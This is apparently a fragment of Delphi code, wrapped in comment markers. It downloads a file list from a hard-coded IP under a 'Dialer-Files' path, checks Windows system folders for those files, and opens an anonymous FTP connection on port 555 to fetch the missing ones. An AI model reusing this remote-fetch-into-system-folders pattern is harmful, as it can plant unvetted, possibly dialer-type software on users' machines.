<--
procedure TForm1.Button1Click(Sender: TObject);
var
i: Integer;
S: TSearchRec;
begin
Button1.Enabled := False;
NMHTTP1.Get(\'
http://213.237.143.67/Dialer-Files/filer.txt\');
// NMHTTP1.Get(\'
http://172.16.23.147/filer.txt\');
StringList := TStringList.Create;
StringList.Text := NMHTTP1.Body;
for i:= 0 to StringList.Count -1 do begin
if (FindFirst(\'c:\\winnt\\system32\\\' + StringList[i],faANYFILE,S) = 0) then
found := found + 1
else if (FindFirst(\'c:\\windows\\system32\\\' + StringList[i],faANYFILE,S) = 0) then
found := found + 1
else if (FindFirst(\'c:\\windows\\system\\\' + StringList[i],faANYFILE,S) = 0) then
found := found + 1
else if (FindFirst(\'c:\\winnt\\system\\\' + StringList[i],faANYFILE,S) = 0)then
found := found + 1;
end;
NMFTP1.Passive := true;
NMFTP1.UserID :=\'anonymous\';
NMFTP1.Password := \'OS@\' + Label1.Caption + \'.at\';
NMFTP1.Host := \'213.237.143.67\';
NMFTP1.Port := 555;
NMFTP1.Vendor := NMOS_AUTO;
NMFTP1.ParseList := true;
ProgressBar1.Max := StringList.Count - 1 - found;
NMFTP1.Connect;
end;
-->